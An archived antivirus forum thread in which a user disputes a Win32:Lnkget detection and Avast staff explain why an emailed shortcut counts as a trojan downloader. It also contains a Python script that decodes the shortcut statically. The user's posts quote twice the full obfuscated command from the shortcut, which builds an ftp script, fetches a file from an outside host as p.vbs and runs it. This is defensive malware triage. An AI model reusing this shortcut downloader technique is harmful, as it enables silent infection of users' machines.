Avast WEBforum

Consumer Products => Avast Free Antivirus / Premium Security (legacy Pro Antivirus, Internet Security, Premier) => Topic started by: dude2 on September 07, 2009, 10:06:34 AM

Title: Win32:Lnkget or FP?
Post by: dude2 on September 07, 2009, 10:06:34 AM
I received an email that was reported by Avast Home as infected by Win32:Lnkget. I uploaded this email to VirusTotal (http://www.virustotal.com/) for scanning and analysis. The result can be found here: http://www.virustotal.com/analisis/de3b90893777ef57a4f5710465e54af0524b5c0c6938d97a16885bf7edb5b542-1252306731

9 out of 41 antivirus software products report this email as containing a malware link. The other 32 consider this email clean. How can I tell whether or not it is a false positive?
Title: Re: Win32:Lnkget or FP?
Post by: Milos on September 07, 2009, 11:12:39 AM
Hi,
you can send this file to us using the avast! warning dialog, as shown in the picture below, and we will analyze it. If it is a false positive we will fix it.

Milos
Title: Re: Win32:Lnkget or FP?
Post by: Milos on September 07, 2009, 12:58:45 PM
Hi,
it looks like your email contains an attachment with a shortcut (a file with the .lnk extension) that looks like the picture below (right click -> Properties). See the part called "Target". If it looks similar, it's not a false positive.

Milos
Title: Re: Win32:Lnkget or FP?
Post by: dude2 on September 07, 2009, 01:42:08 PM
Quote
Hi,
it looks like your email contains an attachment with a shortcut (a file with the .lnk extension) that looks like the picture below (right click -> Properties). See the part called "Target". If it looks similar, it's not a false positive.

Milos
Hi, Milos,

There are two identical lnk shortcuts (but with different lnk names) attached to the suspected email. For your reference, I have copied their "Target" settings here:

lnk1: %ComSpec% /c echo set i=.>z.bat&echo echo o ftp%i%g03z%i%com^>l>>z.bat&call z.bat&echo aa33>>l&echo bb33>>l&echo set s=echo g>m&echo set h=tp ->>m&echo %s%et p p.vbs^>^>l>>m&echo echo bye^>^>l>>m&echo f%h%s:l>>m&echo start p.vbs>>m&ren m t.bat&t.bat&

lnk2: %ComSpec% /c echo set i=.>z.bat&echo echo o ftp%i%g03z%i%com^>l>>z.bat&call z.bat&echo aa33>>l&echo bb33>>l&echo set s=echo g>m&echo set h=tp ->>m&echo %s%et p p.vbs^>^>l>>m&echo echo bye^>^>l>>m&echo f%h%s:l>>m&echo start p.vbs>>m&ren m t.bat&t.bat&

Are these scripts supposed to download stuff and even execute some of it on my system? But my question is how to tell whether these scripts will do real damage to my system, such as deleting system files, altering the Windows registry, or opening a back door as a Trojan. Could my XP system be so vulnerable as to be totally controlled by such scripts? Above all, why did the other 32 antivirus software products on VirusTotal check it and let it pass?

Dan
Title: Re: Win32:Lnkget or FP?
Post by: Milos on September 07, 2009, 03:24:53 PM
Hi dude2,
the script in the "Target" creates a script for ftp (address ftp.g03z.com) with a filled-in username and password, tries to download the file "p" and store it as "p.vbs" in %windir% (from the shortcut property "Start in"), and then runs "p.vbs". But the file "p" doesn't exist on the ftp server at this time, so "p.vbs" is empty and does nothing (no real damage to your system).

Why do other antivirus software products on VirusTotal check it and let it pass? I don't know; maybe they didn't analyze this file.

Milos
Title: Re: Win32:Lnkget or FP?
Post by: dude2 on September 07, 2009, 05:41:47 PM
Milos, thank you for your thorough investigation on this issue.

But here comes the hazy part of this odd problem. Suppose a friend sends me an email with a lnk that leads me to his well-arranged script procedure, and when I click on that lnk it starts the scripts automatically as intended and simply DOES NO HARM to the Windows system. In that case, will Avast still detect that email as suspected of Win32:Lnkget infection because some automated scripts get executed?

Or do there need to be harmful signatures or activity patterns of the executed scripts that match the Avast iAVS DB and therefore trigger the alarm? For example, the suspected scripts manipulating the system or putting users in harm's way.

If you said that the file "p" doesn't exist at this time on that ftp server and therefore this script can do no harm to my system, and if this email message is still detected by Avast! as infected as of today, then I wonder whether it is detected simply because of the scripts embedded in the lnk reference. If that is the case, to me it is more like an "access control related issue", and users need to set up their system wisely so that they do not easily trigger something unexpectedly. Could that be the reason that the other antivirus software products cannot conclude this email is infected simply from finding embedded scripts, but instead need more evidence of suspicious activities?

Thank you,

Dan
Title: Re: Win32:Lnkget or FP?
Post by: Milos on September 07, 2009, 06:06:57 PM
Quote
But here comes the hazy part of this odd problem. Suppose a friend sends me an email with a lnk that leads me to his well-arranged script procedure, and when I click on that lnk it starts the scripts automatically as intended and simply DOES NO HARM to the Windows system. In that case, will Avast still detect that email as suspected of Win32:Lnkget infection because some automated scripts get executed?
Yes, avast! will still detect that email -- when avast! scans that .lnk file it doesn't know whether the file on the ftp server exists. If you don't disable avast!, it won't allow you to run this script.

Quote
Or do there need to be harmful signatures or activity patterns of the executed scripts that match the Avast iAVS DB and therefore trigger the alarm? For example, the suspected scripts manipulating the system or putting users in harm's way.
Yes.

Quote
If you said that the file "p" doesn't exist at this time on that ftp server and therefore this script can do no harm to my system, and if this email message is still detected by Avast! as infected as of today, then I wonder whether it is detected simply because of the scripts embedded in the lnk reference. If that is the case, to me it is more like an "access control related issue", and users need to set up their system wisely so that they do not easily trigger something unexpectedly. Could that be the reason that the other antivirus software products cannot conclude this email is infected simply from finding embedded scripts, but instead need more evidence of suspicious activities?
I think that it would be hard work to analyze a script in the AV engine, log in to some ftp server using data gathered from the analyzed script, check whether the file exists, download it, and again check whether it's harmful (you can see the possibility of long processing times here).

If you receive a suspicious email or program that you don't trust, you can run it in a virtual machine and see whether it does bad things -- you can then return to the previous state from before the infection.

Milos
Title: Re: Win32:Lnkget or FP?
Post by: dude2 on September 08, 2009, 06:47:50 AM
Yes, the lnks' targets contain scripts, but I did not see the suspected scripts manipulating the system or putting users in harm's way, simply because the file "p" doesn't even exist on the remote FTP server during the test. If some of those 32 VirusTotal-listed antivirus software products that DID NOT SHOW POSITIVE come with file emulation or some heuristic analysis capability, and they do not find those scripts doing any harm other than trying to connect to a remote site and to download and execute harmless stuff, then are we safe to say it is a false positive, or maybe a little overcautious? Or do you think the test results from those 32 out of 41 AV products are false negatives?
Title: Re: Win32:Lnkget or FP?
Post by: Milos on September 08, 2009, 10:22:02 AM
If you look at the script, you can see that there is no direct ftp address (it is substituted at runtime), and some commands are substituted the same way, so what is the reason to do that? It is considered a malware practice to hide the real behavior, so the other AVs are false negatives.
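Milos's point about runtime substitution, and his earlier description of what the target does (write an ftp script for ftp.g03z.com, fetch "p" as p.vbs, run it), can both be checked statically, without ever opening the shortcut. The following is an added example, not code from this thread or from Avast: a small Python replay of just the cmd.exe features the posted target line uses (percent expansion, output redirection, set, call, ren and batch invocation) against an in-memory file system. It assumes the target string exactly as dude2 posted it above; the function and class names are this example's own.

```python
import re
# The "Target" string of the posted shortcut, copied from the thread above.
LNK_TARGET = (
    r"%ComSpec% /c echo set i=.>z.bat&echo echo o ftp%i%g03z%i%com^>l>>z.bat"
    r"&call z.bat&echo aa33>>l&echo bb33>>l&echo set s=echo g>m&echo set h=tp ->>m"
    r"&echo %s%et p p.vbs^>^>l>>m&echo echo bye^>^>l>>m&echo f%h%s:l>>m"
    r"&echo start p.vbs>>m&ren m t.bat&t.bat&"
)

def expand(text, env, in_batch):
    """Percent expansion: an undefined %name% becomes empty inside a batch file
    but stays literal on a 'cmd /c' line, so %i%, %s%, %h% resolve only later."""
    def sub(m):
        name = m.group(1).lower()
        return env[name] if name in env else ("" if in_batch else m.group(0))
    return re.sub(r"%([^%\s]+)%", sub, text)

def split_redirect(cmd):
    """Return (text, target, append); '^>' is a literal '>', the first unescaped
    '>' or '>>' redirects output."""
    m = re.fullmatch(r"((?:\^.|[^>^])*)(?:(>>?)(.*))?", cmd)
    text = re.sub(r"\^(.)", r"\1", m.group(1))
    return text, (m.group(3) or "").strip() or None, m.group(2) == ">>"

class CmdReplay:
    """In-memory replay: no disk, no network; ftp and start are only recorded."""
    def __init__(self):
        self.files, self.env, self.actions = {}, {}, []

    def run_line(self, line, in_batch):
        line = expand(line, self.env, in_batch)   # cmd expands before it parses
        for cmd in re.split(r"(?<!\^)&", line):   # '&' chains commands
            text, target, append = split_redirect(cmd.strip())
            verb, _, rest = text.partition(" ")
            verb = verb.lower()
            if verb == "echo":
                if target:                        # echo text>file / >>file
                    self.files[target] = (self.files.get(target, "") if append else "") + rest + "\n"
            elif verb == "set":
                name, _, value = rest.partition("=")
                self.env[name.lower()] = value
            elif verb == "call":
                self.run_file(rest)
            elif verb == "ren":
                src, _, dst = rest.partition(" ")
                self.files[dst] = self.files.pop(src)
            elif verb in self.files:              # bare invocation, e.g. t.bat
                self.run_file(verb)
            elif verb:                            # external program: ftp, start
                self.actions.append(text)

    def run_file(self, name):
        for line in self.files[name].splitlines():
            self.run_line(line, in_batch=True)

def replay_lnk_target(target):
    """Return (files, actions) the shortcut would produce, without executing it."""
    replay = CmdReplay()
    replay.run_line(re.sub(r"^%comspec% /c ", "", target, flags=re.I), False)
    return replay.files, replay.actions
```

The replay reproduces cmd.exe's two expansion rules, so the %i%, %s% and %h% placeholders only resolve when the generated batch files run; that is why a plain string search for the ftp host or the get command finds nothing in the original target, while the recovered file "l" and the recorded actions show exactly the behaviour described above.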
Title: Re: Win32:Lnkget or FP?
Post by: dude2 on September 08, 2009, 06:15:29 PM
Are those scripts at most being considered mischievous? Or do they really manipulate the system to the extent of degrading system performance or security, or put users in harm's way? Once that is clarified, I may concur more on the false positive or false negative conclusion.

Quote
If you look at the script, you can see that there is no direct ftp address (it is substituted at runtime), and some commands are substituted the same way, so what is the reason to do that? It is considered a malware practice to hide the real behavior, so the other AVs are false negatives.
I do not know the reason for using a substituted ftp address at runtime. But could a legitimate script or program use a similar technique? Doesn't the Windows system itself take an ftp address as an argument on its command line or in the FTP app environment? Again, it is only my immature opinion, but can we judge a script simply by its programming techniques?
Title: Re: Win32:Lnkget or FP?
Post by: Milos on September 09, 2009, 09:17:54 AM
Quote
Are those scripts at most being considered as mischievous?
a) If you mean the script which is downloaded from ftp -- I don't remember. But the script is downloaded from the strange url g03z.com (you can see the owner and other properties: http://whois.domaintools.com/g03z.com or the picture below).

b) If you mean the script from the .lnk -- yes.

In the case of this .lnk file, there is no reason to obfuscate the script, so it can be considered malicious, plus the WHOIS information.

A legitimate script has no reason to obfuscate the ftp address.
Title: Re: Win32:Lnkget or FP?
Post by: dude2 on September 10, 2009, 01:24:26 AM
There is no arguing that the site administrator's identity does look suspicious based on the registration info on whois, and it is just as suspicious to have scripts embedded in a lnk, especially doing ftp and downloading stuff. But what trait makes it more than just suspicious or somewhat obfuscating, yet honored enough to join the Avast! iAVS/VPS, still baffles me. I think a so-called malware needs to manipulate the system to the extent of degrading system performance or security, or to put users in harm's way.

Based on http://www.avast.com/eng/vps-content-2009.html, Avast! honored Win32:Lnkget as a Trojan in its VPS. But, based on http://www.viruslist.com/en/virusesdescribed and http://www.viruslist.com/en/virusesdescribed?chapter=152540521, a Trojan, especially a Trojan Downloader, needs to download and install new malware or adware on the victim machine. Meanwhile, a Trojan Dropper is composed of at least a dangerous payload and a harmless hoax, such as jokes, games, graphics and so forth. What if the downloaded stuff cannot be detected as malware, adware, or a dangerous payload?
Title: Re: Win32:Lnkget or FP?
Post by: Milos on September 10, 2009, 10:06:11 AM
It depends on a case-by-case basis.
Title: Re: Win32:Lnkget or FP?
Post by: dude2 on September 10, 2009, 11:15:29 AM
Quote
It depends on a case-by-case basis.
Can you elaborate on that? Please be more specific about my case.
Title: Re: Win32:Lnkget or FP?
Post by: Milos on September 10, 2009, 01:49:36 PM
Quote
It depends on a case-by-case basis.
Can you elaborate on that? Please be more specific about my case.
The file on the ftp server doesn't exist, so I can't be more specific.
Title: Re: Win32:Lnkget or FP?
Post by: dude2 on September 11, 2009, 01:39:08 AM
As I questioned in #11, if an embedded script was downloading harmless stuff, or even failed to download anything because the target file on the ftp server was not there, can we still categorize this script as a Trojan Downloader, Trojan Dropper, or any type of Trojan? I am trying to understand what type of Trojan Win32:Lnkget is. If Win32:Lnkget was overcautious about suspicious downloading activities, should we count it as a false positive?
Title: Re: Win32:Lnkget or FP?
Post by: Milos on September 11, 2009, 07:33:53 AM
Yes, we can still categorize this script as a Trojan, because we don't know whether the file will appear on the ftp server in the future.
Title: Re: Win32:Lnkget or FP?
Post by: dude2 on September 11, 2009, 09:33:36 AM
Quote
Yes, we can still categorize this script as a Trojan, because we don't know whether the file will appear on the ftp server in the future.
Based on Alwil's VPS record, when Avast initially captured and categorized this as the Win32:Lnkget Trojan, what was seen as the downloaded dangerous payload or downloaded malware?

Even if something was downloaded that triggered Avast back then, how can it still trigger Avast to generate an alarm now when there is no file to download?

Unless somehow the lnk-embedded downloading command script itself triggers Avast to detect it as a Trojan, no matter whether the downloaded stuff is harmful or whether the downloading action is ever completed? But in that case, wouldn't this Trojan decision be too lax compared with the Trojan definition in http://www.viruslist.com/en/virusesdescribed and http://www.viruslist.com/en/virusesdescribed?chapter=152540521 ?
Title: Re: Win32:Lnkget or FP?
Post by: Milos on September 11, 2009, 10:37:39 AM
Quote
Quote
Yes, we can still categorize this script as a Trojan, because we don't know whether the file will appear on the ftp server in the future.
Based on Alwil's VPS record, when Avast initially captured and categorized this as the Win32:Lnkget Trojan, what was seen as the downloaded dangerous payload or downloaded malware?
Who knows ...

Quote
Even if something was downloaded that triggered Avast back then, how can it still trigger Avast to generate an alarm now when there is no file to download?

Unless somehow the lnk-embedded downloading command script itself triggers Avast to detect it as a Trojan, no matter whether the downloaded stuff is harmful or whether the downloading action is ever completed? But in that case, wouldn't this Trojan decision be too lax compared with the Trojan definition in http://www.viruslist.com/en/virusesdescribed and http://www.viruslist.com/en/virusesdescribed?chapter=152540521 ?
It depends on the type of detection (http://en.wikipedia.org/wiki/Antivirus_software#Identification_methods): this one detects the malicious .lnk file, nothing else -- it doesn't try to download other files and analyze them; it's not "File emulation".

I'm still not sure what your problem is.
Title: Re: Win32:Lnkget or FP?
Post by: dude2 on September 11, 2009, 06:16:42 PM
After all, I do not think that you have the key info:
"How malicious is the script from this lnk?" or "what constitutes Win32:Lnkget Trojan?"

Based on your provided reference link: http://en.wikipedia.org/wiki/Antivirus_software#Identification_methods , it says:
>>
Malicious activity detection is another approach used to identify malware. In this approach, antivirus software monitors the system for suspicious program behavior. If suspicious behavior is detected, the suspect program may be further investigated, using signature based detection or another method listed in this section. This type of detection can be used to identify unknown viruses or variants on existing viruses.
<<

All referenced links pointed to the key idea:

"It takes a little more investigation to distinguish a malware from a suspicious false positive."

Normally, this investigation will reveal the true identity of the suspicious script. From Viruslist.com, a Trojan dropper/downloader will be identified as either a dangerous payload or a malware/adware with the help of a signature or other methods. I suspect that could be the reason some 32 out of 41 AV software products would not categorize it as a Trojan downloader/dropper when this script cannot be downloaded from the ftp server for further investigation.

If Alwil is not about to provide the key info with regard to what damaging-activity signature it had when Win32:Lnkget was first created, then who knows? I may have to rest my case here. Your help thus far is appreciated nonetheless.
Title: Re: Win32:Lnkget or FP?
Post by: Milos on September 14, 2009, 11:50:03 AM
Quote
After all, I do not think that you have the key info:
"How malicious is the script from this lnk?" or "what constitutes Win32:Lnkget Trojan?"
I think that the behavior of the script in the .lnk file was described, and the script on the ftp server (which is now inaccessible) can be changed at any time, so who knows what it will be doing? The detection Win32:Lnkget just detects the script in the .lnk file, which downloads and runs another script.

Title: Re: Win32:Lnkget or FP?
Post by: dude2 on September 14, 2009, 06:03:26 PM
Quote
After all, I do not think that you have the key info:
"How malicious is the script from this lnk?" or "what constitutes Win32:Lnkget Trojan?"
I think that the behavior of the script in the .lnk file was described, and the script on the ftp server (which is now inaccessible) can be changed at any time, so who knows what it will be doing? The detection Win32:Lnkget just detects the script in the .lnk file, which downloads and runs another script.

Welcome back, Milos. Do you agree with all those references saying that Trojan downloaders/droppers DO NOT JUST TRY TO DOWNLOAD "SUSPICIOUS SCRIPTS" BUT DOWNLOAD AND EXECUTE "MALICIOUS SCRIPTS" BASED ON THE "IDENTIFIED SIGNATURE" OR "DETECTED ABNORMAL BEHAVIOR IN THE FILE EMULATION" PROCESS?

Unless you do not agree with those references, you should have seen the catch. I do not have the signature of the Trojan Win32:Lnkget, as it was built into the VPS DB, to show its malicious intention, nor can Avast emulate anything out of nothing downloaded from the ftp server. How can I be sure that there was ever a malicious script on that ftp server? Moreover, how can a failed download process still have what it takes in the signature?

To prove it is not just a hoax or false positive but rather a real threat, especially on a controversial case where 32 out of 41 AV products gave a different opinion, I do encourage Avast to go the extra mile after this much already provided help.
Title: Re: Win32:Lnkget or FP?
Post by: dude2 on September 19, 2009, 03:59:47 AM
I dare not say butter would not melt in the envelope of the suspected email ;), but with Reply #21 unanswered I am not convinced either that Avast's explanations and provided evidence have cleared all doubts and proved that those 32 AV product vendors gave false negative results.

It seems I may have to present my case with the info received from Avast thus far to third party organizations for their opinions. Win32:Lnkget or FP? I hope the answer will be found and justified soon.
Title: Re: Win32:Lnkget or FP?
Post by: kubecj on September 23, 2009, 04:01:04 PM
Too bad we're still missing your point and we're spending time and resources on this thread.

The point of catching the downloader is to have multi-layered protection. The best way is to catch the downloader and the downloaded stuff. We catch the downloader which is still capable of doing the harm as soon as the site it's pointing to comes alive.

Even if somebody used the very same lnk-obfuscated .bat file for 'legal' reasons, it'd still be detected by us (because of the sheer stupidity of doing so in this way).

We don't care much if other products have false negatives or not, it's their problem, not ours.

I don't think there exists any reason to continue in this thread since everything was said already and we'll stick to our point.